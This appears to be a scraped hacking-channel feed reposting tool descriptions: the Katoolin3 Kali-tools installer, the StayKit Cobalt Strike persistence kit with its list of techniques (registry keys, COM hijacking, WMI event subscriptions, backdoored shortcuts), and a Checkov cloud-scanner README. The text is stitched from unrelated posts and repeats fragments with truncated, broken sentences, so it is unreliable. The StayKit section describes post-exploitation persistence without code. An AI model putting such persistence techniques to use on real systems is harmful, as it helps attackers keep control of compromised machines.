Please install the python3-apt packageplease make sure katoolin3 runs with exactly the same python3 version as the python3-aptpackage. On modern distributions python3-aptis only for python3.7 and on older distributions python3-aptis only for python3.5. Katoolin3 has to be run accordingly with python3.7 or python3.5. UsageThe program flow of katoolin3 is realized by presenting a list of options that you can choose from. These lists look like that:0) …
1) …
2) … Installing toolsTo install a package enter the corresponding number. To install multiple packages at once specify a range like
3-5, a list like 1,2,3or combine them like 1,2,5-7,9. You can also install all packages at once. Uninstalling toolsThis works just like installing except that you have to prepend a ~before your selection. You can also uninstall all packages at once. SearchingKatoolin3 supports searching the package cache.E.g. if you want to install some tools related to SQL injections you can go into the search menu and search for
sql injection.If you want to have specific information about a package just enter the package name in the same search menu.
For more functionalities see the help dialogue inside the program. UpdatingTo update your tool list execute
chmod +x ./update.sh;
sudo ./update.sh; UninstallingTo uninstall katoolin3 execute
chmod +x ./uninstall.sh;
sudo ./uninstall.sh;
Uninstalling the Kali tools can be done inside katoolin3. Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Katoolin3 : Get Your Favourite Kali Linux Tools On Debian/Ubuntu
Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu. This program is a port of katoolin from LionSec to python3.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
StayKit : Cobalt Strike Kit For Persistence
StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the Sharp Stay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.
IMPORTANT: To use the script a user will only need to load the
The persistence menu will be added to the beacon. Due to the nature of how each technique is different there is only a GUI menu and no beacon commands.
Available options:
* ElevatedRegistryKey
* UserRegistryKey
* UserInitMprLogonScriptKey
* ElevatedUserInitKey
* ScheduledTask
* ListScheduledTasks
* ScheduledTaskAction
* SchTaskCOMHijack
* CreateService
* ListRunningServices
* WMIEventSub
* GetScheduledTaskCOMHandler
* JunctionFolder
* StartupDirectory
* NewLNK
* BackdoorLNK
* ListTaskNames
Dependencies
* Mono (MCS) for compiling .NET assemblies (Used with dynamic payload creation)
Download
___________________________
@hacking_Attack
@Hacking_Video
StayKit : Cobalt Strike Kit For Persistence
StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the Sharp Stay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.
IMPORTANT: To use the script a user will only need to load the
StayKit.cnaaggressor script. Additionally, the SharpStay assembly will need to be compiled and placed into the directory where StayKit.cnais located. Finally, if selecting a template for the payload some may require dynamic compiling which will uses Mono.The persistence menu will be added to the beacon. Due to the nature of how each technique is different there is only a GUI menu and no beacon commands.
Available options:
* ElevatedRegistryKey
* UserRegistryKey
* UserInitMprLogonScriptKey
* ElevatedUserInitKey
* ScheduledTask
* ListScheduledTasks
* ScheduledTaskAction
* SchTaskCOMHijack
* CreateService
* ListRunningServices
* WMIEventSub
* GetScheduledTaskCOMHandler
* JunctionFolder
* StartupDirectory
* NewLNK
* BackdoorLNK
* ListTaskNames
Dependencies
* Mono (MCS) for compiling .NET assemblies (Used with dynamic payload creation)
Download
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
StayKit : Cobalt Strike Kit For Persistence !!! Kali Linux
StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the Sharp Stay .NET assembly.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Checkov : Prevent Cloud Misconfigurations During Build-Time For Terraform
Checkov is a static code analysis tool for infrastructure-as-code.
It scans cloud infrastructure provisioned using Terraform, Terraform plan, Cloudformation, AWS SAM, Kubernetes, Helm charts, Kustomize, Dockerfile, Serverless, Bicep or ARM Templates and detects security and compliance misconfigurations using graph-based scanning.
Checkov also powers Bridgecrew, the developer-first platform that codifies and streamlines cloud security throughout the development lifecycle. Bridgecrew identifies, fixes, and prevents misconfigurations in cloud resources and infrastructure-as-code files. Features* Over 1000 built-in policies cover security and compliance best practices for AWS, Azure and Google Cloud.
* Scans Terraform, Terraform Plan, CloudFormation, AWS SAM, Kubernetes, Dockerfile, Serverless framework, Bicep and ARM template files.
* Supports Context-awareness policies based on in-memory graph-based scanning.
* Supports Python format for attribute policies and YAML format for both attribute and composite policies.
* Detects AWS credentials in EC2 Userdata, Lambda environment variables and Terraform providers.
* Identifies secrets using regular expressions, keywords, and entropy based detection.
* Evaluates Terraform Provider settings to regulate the creation, management, and updates of IaaS, PaaS or SaaS managed through Terraform.
* Policies support evaluation of variables to their optional default value.
* Supports in-line suppression of accepted risks or false-positives to reduce recurring scan failures. Also supports global skip from using CLI.
* Output currently available as CLI, CycloneDX, JSON, JUnit XML, SARIF and github markdown and link to remediation guides. ScreenshotsScan results in CLI
Scheduled scan result in Jenkins Getting startedRequirements* Python >= 3.7 (Data classes are available for Python 3.7+)
* Terraform >= 0.12 Installationpip3 install checkov
Installation on Alpine:
pip3 install –upgrade pip && pip3 install –upgrade setuptools
pip3 install checkov
Installation on Ubuntu 18.04 LTS:
Ubuntu 18.04 ships with Python 3.6. Install python 3.7 (from ppa repository)
sudo apt update
sudo apt install software-properties-common
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt install python3.7
sudo apt install python3-pip
sudo python3.7 -m pip install -U checkov #to install or upgrade checkov)
or using homebrew (MacOS only)
brew install checkov
or
brew upgrade checkov
Enabling bash autocomplete
source <(register-python-argcomplete Upgradeif you installed checkov with pip3
pip3 install -U checkov
pip3 install -U checkov
Configure an input folder or file
checkov –directory /user/path/to/iac/code
Or a specific file or files
checkov –file /user/tf/example.tf
Or
checkov -f /user/cloudformation/example1.yml -f /user/cloudformation/example2.yml
Or a terraform plan file in json format
terraform init
terraform plan -out tf.plan
terraform show -json tf.plan > tf.json
checkov -f tf.json
Note:
check: CKV_AWS_21: “Ensure all data stored in the S3 bucket have versioning enabled”
FAILED for resource: aws_s3_bucket.customer
File: /tf/tf.json:0-0
Guide: https://docs.bridgecrew.io/docs/s3_16-enable-versioning
If you have installed
terraform show -json tf.plan | jq ‘.’ > tf.json
Scan result would be much user friendly.
checkov -f tf.json
Check: CKV_AWS_21: “Ensure all data stored in the S3 bucket have versioning enabled”
FAILED for resource: aws_s3_bucket.customer
File: /tf/tf1.json:224-268
Guide: https://docs.bridgecrew.io/doc[...]
___________________________
@hacking_Attack
@Hacking_Video
Checkov : Prevent Cloud Misconfigurations During Build-Time For Terraform
Checkov is a static code analysis tool for infrastructure-as-code.
It scans cloud infrastructure provisioned using Terraform, Terraform plan, Cloudformation, AWS SAM, Kubernetes, Helm charts, Kustomize, Dockerfile, Serverless, Bicep or ARM Templates and detects security and compliance misconfigurations using graph-based scanning.
Checkov also powers Bridgecrew, the developer-first platform that codifies and streamlines cloud security throughout the development lifecycle. Bridgecrew identifies, fixes, and prevents misconfigurations in cloud resources and infrastructure-as-code files. Features* Over 1000 built-in policies cover security and compliance best practices for AWS, Azure and Google Cloud.
* Scans Terraform, Terraform Plan, CloudFormation, AWS SAM, Kubernetes, Dockerfile, Serverless framework, Bicep and ARM template files.
* Supports Context-awareness policies based on in-memory graph-based scanning.
* Supports Python format for attribute policies and YAML format for both attribute and composite policies.
* Detects AWS credentials in EC2 Userdata, Lambda environment variables and Terraform providers.
* Identifies secrets using regular expressions, keywords, and entropy based detection.
* Evaluates Terraform Provider settings to regulate the creation, management, and updates of IaaS, PaaS or SaaS managed through Terraform.
* Policies support evaluation of variables to their optional default value.
* Supports in-line suppression of accepted risks or false-positives to reduce recurring scan failures. Also supports global skip from using CLI.
* Output currently available as CLI, CycloneDX, JSON, JUnit XML, SARIF and github markdown and link to remediation guides. ScreenshotsScan results in CLI
Scheduled scan result in Jenkins Getting startedRequirements* Python >= 3.7 (Data classes are available for Python 3.7+)
* Terraform >= 0.12 Installationpip3 install checkov
Installation on Alpine:
pip3 install –upgrade pip && pip3 install –upgrade setuptools
pip3 install checkov
Installation on Ubuntu 18.04 LTS:
Ubuntu 18.04 ships with Python 3.6. Install python 3.7 (from ppa repository)
sudo apt update
sudo apt install software-properties-common
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt install python3.7
sudo apt install python3-pip
sudo python3.7 -m pip install -U checkov #to install or upgrade checkov)
or using homebrew (MacOS only)
brew install checkov
or
brew upgrade checkov
Enabling bash autocomplete
source <(register-python-argcomplete Upgradeif you installed checkov with pip3
pip3 install -U checkov
pip3 install -U checkov
Configure an input folder or file
checkov –directory /user/path/to/iac/code
Or a specific file or files
checkov –file /user/tf/example.tf
Or
checkov -f /user/cloudformation/example1.yml -f /user/cloudformation/example2.yml
Or a terraform plan file in json format
terraform init
terraform plan -out tf.plan
terraform show -json tf.plan > tf.json
checkov -f tf.json
Note:
terraform showoutput file tf.jsonwill be a single line. For that reason all findings will be reported line number 0 by checkovcheck: CKV_AWS_21: “Ensure all data stored in the S3 bucket have versioning enabled”
FAILED for resource: aws_s3_bucket.customer
File: /tf/tf.json:0-0
Guide: https://docs.bridgecrew.io/docs/s3_16-enable-versioning
If you have installed
jqyou can convert json file into multiple lines with the following command:terraform show -json tf.plan | jq ‘.’ > tf.json
Scan result would be much user friendly.
checkov -f tf.json
Check: CKV_AWS_21: “Ensure all data stored in the S3 bucket have versioning enabled”
FAILED for resource: aws_s3_bucket.customer
File: /tf/tf1.json:224-268
Guide: https://docs.bridgecrew.io/doc[...]
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Checkov : Prevent Cloud Misconfigurations During Build-Time
Checkov is a static code analysis tool for infrastructure-as-code. It scans cloud infrastructure provisioned using Terraform.
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux Tutorials Checkov : Prevent Cloud Misconfigurations During Build-Time For Terraform Checkov is a static code analysis tool for infrastructure-as-code. It scans cloud infrastructure provisioned using Terraform, Terraform plan, Cloudformation, AWS…
s/s3_16-enable-versioning
225 “values”: {
226 “acceleration_status”: “”,
227 “acl”: “private”,
228 | “arn”: “arn:aws:s3:::mybucket”,
Alternatively, specify the repo root of the hcl files used to generate the plan file, using the
checkov -f tf.json –repo-root-for-plan-enrichment /user/path/to/iac/code
Scan result sample (CLI)
Passed Checks: 1, Failed Checks: 1, Suppressed Checks: 0
Check: “Ensure all data stored in the S3 bucket is securely encrypted at rest”
/main.tf:
Passed for resource: aws_s3_bucket.template_bucket
Check: “Ensure all data stored in the S3 bucket is securely encrypted at rest”
/../regionStack/main.tf:
Failed for resource: aws_s3_bucket.sls_deployment_bucket_name
Using Docker
docker pull bridgecrew/checkov
docker run –tty –rm –volume /user/tf:/tf –workdir /tf bridgecrew/checkov –directory /tf
Note: if you are using Python 3.6(Default version in Ubuntu 18.04) checkov will not work and it will fail with
Note that there are certain cases where redirecting
The
checkov –directory . –check CKV_AWS_20,CKV_AWS_57
Run all checks except the one specified:
checkov -d . –skip-check CKV_AWS_20
Run all checks except checks with specified patterns:
checkov -d . –skip-check CKV_AWS*
Run all checks that are MEDIUM severity or higher (requires API key):
checkov -d . –check MEDIUM –bc-api-key …
Run all checks that are MEDIUM severity or higher, as well as check CKV_123 (assume this is a LOW severity check):
checkov -d . –check MEDIUM,CKV_123 –bc-api-key …
Skip all checks that are MEDIUM severity or lower:
checkov -d . –skip-check MEDIUM –bc-api-key …
Skip all checks that are MEDIUM severity or lower, as well as check CKV_789 (assume this is a high severity check):
checkov -d . –skip-check MEDIUM,CKV_789 –bc-api-key …
Run all checks that are MEDIUM severity or higher, but skip check CKV_123 (assume this is a medium or higher severity check):
checkov -d . –check MEDIUM –skip-check CKV_123 –bc-api-key … Suppressing/Ignoring a checkLike any static-analysis tool it is limited by its analysis scope. For example, if a resource is managed manually, or using subsequent configuration management tooling, suppression can be inserted as a simple code annotation. Suppression comment formatTo skip a check on a given Terraform definition block or CloudFormation resource, apply the following comment pattern inside it’s scope: checkov:skip=* is one of the [available check scanners](docs/5.Policy Index/all.md)
* is an optional suppression reason to be in[...]
___________________________
@hacking_Attack
@Hacking_Video
225 “values”: {
226 “acceleration_status”: “”,
227 “acl”: “private”,
228 | “arn”: “arn:aws:s3:::mybucket”,
Alternatively, specify the repo root of the hcl files used to generate the plan file, using the
--repo-root-for-plan-enrichmentflag, to enrich the output with the appropriate file path, line numbers, and codeblock of the resource(s). An added benefit is that check suppressions will be handled accordingly.checkov -f tf.json –repo-root-for-plan-enrichment /user/path/to/iac/code
Scan result sample (CLI)
Passed Checks: 1, Failed Checks: 1, Suppressed Checks: 0
Check: “Ensure all data stored in the S3 bucket is securely encrypted at rest”
/main.tf:
Passed for resource: aws_s3_bucket.template_bucket
Check: “Ensure all data stored in the S3 bucket is securely encrypted at rest”
/../regionStack/main.tf:
Failed for resource: aws_s3_bucket.sls_deployment_bucket_name
Using Docker
docker pull bridgecrew/checkov
docker run –tty –rm –volume /user/tf:/tf –workdir /tf bridgecrew/checkov –directory /tf
Note: if you are using Python 3.6(Default version in Ubuntu 18.04) checkov will not work and it will fail with
ModuleNotFoundError: No module named 'dataclasses'error message. In this case, you can use the docker version instead.Note that there are certain cases where redirecting
docker run --ttyoutput to a file – for example, if you want to save the Checkov JUnit output to a file – will cause extra control characters to be printed. This can break file parsing. If you encounter this, remove the --ttyflag.The
--workdir /tfflag is optional to change the working directory to the mounted volume. If you are using the SARIF output -o sarifthis will output the results. sarif file to the mounted volume (/user/tf in the example above). If you do not include that flag, the working directory will be “/”. Running or skipping checksUsing command line flags you can specify to run only named checks (allow list) or run all checks except those listed (deny list). If you are using the platform integration via API key, you can also specify a severity threshold to skip and / or include. See the docs for more detailed information on how these flags work together. ExamplesAllow only the two specified checks to run:checkov –directory . –check CKV_AWS_20,CKV_AWS_57
Run all checks except the one specified:
checkov -d . –skip-check CKV_AWS_20
Run all checks except checks with specified patterns:
checkov -d . –skip-check CKV_AWS*
Run all checks that are MEDIUM severity or higher (requires API key):
checkov -d . –check MEDIUM –bc-api-key …
Run all checks that are MEDIUM severity or higher, as well as check CKV_123 (assume this is a LOW severity check):
checkov -d . –check MEDIUM,CKV_123 –bc-api-key …
Skip all checks that are MEDIUM severity or lower:
checkov -d . –skip-check MEDIUM –bc-api-key …
Skip all checks that are MEDIUM severity or lower, as well as check CKV_789 (assume this is a high severity check):
checkov -d . –skip-check MEDIUM,CKV_789 –bc-api-key …
Run all checks that are MEDIUM severity or higher, but skip check CKV_123 (assume this is a medium or higher severity check):
checkov -d . –check MEDIUM –skip-check CKV_123 –bc-api-key … Suppressing/Ignoring a checkLike any static-analysis tool it is limited by its analysis scope. For example, if a resource is managed manually, or using subsequent configuration management tooling, suppression can be inserted as a simple code annotation. Suppression comment formatTo skip a check on a given Terraform definition block or CloudFormation resource, apply the following comment pattern inside it’s scope: checkov:skip=* is one of the [available check scanners](docs/5.Policy Index/all.md)
* is an optional suppression reason to be in[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
s/s3_16-enable-versioning 225 “values”: { 226 “acceleration_status”: “”, 227 “acl”: “private”, 228 | “arn”: “arn:aws:s3:::mybucket”, Alternatively, specify the repo root of the hcl files used to generate the plan file, using the --repo-root-for-plan-enrichmentflag…
cluded in the output ExampleThe following comment skips the
resource “aws_s3_bucket” “foo-bucket” {
region = var.region
#checkov:skip=CKV_AWS_20:The bucket is a public static content host
bucket = local.bucket_name
force_destroy = true
acl = “public-read”
}
The output would now contain a
…
…
Check: “S3 Bucket has an ACL defined which allows public access.”
SKIPPED for resource: aws_s3_bucket.foo-bucket
Suppress comment: The bucket is a public static content host
File: /example_skip_acl.tf:1-25
To suppress checks in Kubernetes manifests, annotations are used with the following format: checkov.io/skip#: For example:
apiVersion: v1
kind: Pod
metadata:
name: mypod
annotations:
checkov.io/skip1: CKV_K8S_20=I don’t care about Privilege Escalation :-O
checkov.io/skip2: CKV_K8S_14
checkov.io/skip3: CKV_K8S_11=I have not set CPU limits as I want BestEffort QoS
spec:
containers:
… LoggingFor detailed logging to stdout set up the environment variable
Default is
By default, all directories named
* Directory against which checkov is run. (
* Current working directory where checkov is called.
* User’s home directory.
Attention: it is a best practice for checkov configuration file to be loaded from a trusted source composed by a verified identity, so that scanned files, check ids and loaded custom checks are as desired.
Users can also pass in the path to a config file via the command line. In this case, the other config files will be ignored. For example:
checkov –config-file path/to/config.yaml
Users can also create a config file using the
checkov –compact –directory test-dir –docker-image sample-image –dockerfile-path Dockerfile –download-external-modules True –external-checks-dir sample-dir –no-guide –quiet –repo-id bridgecrew/sample-repo –skip-check CKV_DOCKER_3,CKV_DOCKER_2 –skip-fixes –skip-framework dockerfile secrets –skip-suppressions –soft-fail –branch develop –check CKV_DOCKER_1 –c[...]
___________________________
@hacking_Attack
@Hacking_Video
CKV_AWS_20check on the resource identified by foo-bucket, where the scan checks if an AWS S3 bucket is private. In the example, the bucket is configured with public read access; Adding the suppress comment would skip the appropriate check instead of the check to fail.resource “aws_s3_bucket” “foo-bucket” {
region = var.region
#checkov:skip=CKV_AWS_20:The bucket is a public static content host
bucket = local.bucket_name
force_destroy = true
acl = “public-read”
}
The output would now contain a
SKIPPEDcheck result entry:…
…
Check: “S3 Bucket has an ACL defined which allows public access.”
SKIPPED for resource: aws_s3_bucket.foo-bucket
Suppress comment: The bucket is a public static content host
File: /example_skip_acl.tf:1-25
To suppress checks in Kubernetes manifests, annotations are used with the following format: checkov.io/skip#: For example:
apiVersion: v1
kind: Pod
metadata:
name: mypod
annotations:
checkov.io/skip1: CKV_K8S_20=I don’t care about Privilege Escalation :-O
checkov.io/skip2: CKV_K8S_14
checkov.io/skip3: CKV_K8S_11=I have not set CPU limits as I want BestEffort QoS
spec:
containers:
… LoggingFor detailed logging to stdout set up the environment variable
LOG_LEVELto DEBUG.Default is
LOG_LEVEL=WARNING. Skipping directoriesTo skip files or directories, use the argument --skip-path, which can be specified multiple times. This argument accepts regular expressions for paths relative to the current working directory. You can use it to skip entire directories and / or specific files.By default, all directories named
node_modules, .terraform, and .serverlesswill be skipped, in addition to any files or directories beginning with .. To cancel skipping directories beginning with .override IGNORE_HIDDEN_DIRECTORY_ENVenvironment variable export IGNORE_HIDDEN_DIRECTORY_ENV=falseYou can override the default set of directories to skip by setting the environment variable CKV_IGNORED_DIRECTORIES. Note that if you want to preserve this list and add to it, you must include these values. For example, CKV_IGNORED_DIRECTORIES=mynewdirwill skip only that directory, but not the others mentioned above. This variable is legacy functionality; we recommend using the --skip-fileflag. VSCODE ExtensionIf you want to use checkov’s within vscode, give a try to the vscode extension available at vscode Configuration using a config fileCheckov can be configured using a YAML configuration file. By default, checkov looks for a .checkov.yamlor .checkov.ymlfile in the following places in order of precedence:* Directory against which checkov is run. (
--directory)* Current working directory where checkov is called.
* User’s home directory.
Attention: it is a best practice for checkov configuration file to be loaded from a trusted source composed by a verified identity, so that scanned files, check ids and loaded custom checks are as desired.
Users can also pass in the path to a config file via the command line. In this case, the other config files will be ignored. For example:
checkov –config-file path/to/config.yaml
Users can also create a config file using the
--create-configcommand, which takes the current command line args and writes them out to a given path. For example:checkov –compact –directory test-dir –docker-image sample-image –dockerfile-path Dockerfile –download-external-modules True –external-checks-dir sample-dir –no-guide –quiet –repo-id bridgecrew/sample-repo –skip-check CKV_DOCKER_3,CKV_DOCKER_2 –skip-fixes –skip-framework dockerfile secrets –skip-suppressions –soft-fail –branch develop –check CKV_DOCKER_1 –c[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
cluded in the output ExampleThe following comment skips the CKV_AWS_20check on the resource identified by foo-bucket, where the scan checks if an AWS S3 bucket is private. In the example, the bucket is configured with public read access; Adding the suppress…
reate-config /Users/sample/config.yml
Will create a
branch: develop
check:
* CKV_DOCKER_1
compact: true
directory:
* test-dir
docker-image: sample-image
dockerfile-path: Dockerfile
download-external-modules: true
evaluate-variables: true
external-checks-dir:
* sample-dir
external-modules-download-path: .external_modules
framework:
* all
no-guide: true
output: cli
quiet: true
repo-id: bridgecrew/sample-repo
skip-check:
* CKV_DOCKER_3
* CKV_DOCKER_2
skip-fixes: true
skip-framework:
* dockerfile
* secrets
skip-suppressions: true
soft-fail: true
Users can also use the
checkov –show-config
Will display:
Command Line Args: –show-config
Environment Variables:
BC_API_KEY: your-api-key
Config File (/Users/sample/.checkov.yml):
soft-fail: False
branch: master
skip-check: [‘CKV_DOCKER_3’, ‘CKV_DOCKER_2’]
Defaults:
–output: cli
–framework: [‘all’]
–download-external-modules:False
–external-modules-download-path:.external_modules
–evaluate-variables:True Download
___________________________
@hacking_Attack
@Hacking_Video
Will create a
config.yamlfile which looks like this:branch: develop
check:
* CKV_DOCKER_1
compact: true
directory:
* test-dir
docker-image: sample-image
dockerfile-path: Dockerfile
download-external-modules: true
evaluate-variables: true
external-checks-dir:
* sample-dir
external-modules-download-path: .external_modules
framework:
* all
no-guide: true
output: cli
quiet: true
repo-id: bridgecrew/sample-repo
skip-check:
* CKV_DOCKER_3
* CKV_DOCKER_2
skip-fixes: true
skip-framework:
* dockerfile
* secrets
skip-suppressions: true
soft-fail: true
Users can also use the
--show-configflag to view all the args and settings and where they came from i.e. commandline, config file, environment variable or default. For example:checkov –show-config
Will display:
Command Line Args: –show-config
Environment Variables:
BC_API_KEY: your-api-key
Config File (/Users/sample/.checkov.yml):
soft-fail: False
branch: master
skip-check: [‘CKV_DOCKER_3’, ‘CKV_DOCKER_2’]
Defaults:
–output: cli
–framework: [‘all’]
–download-external-modules:False
–external-modules-download-path:.external_modules
–evaluate-variables:True Download
___________________________
@hacking_Attack
@Hacking_Video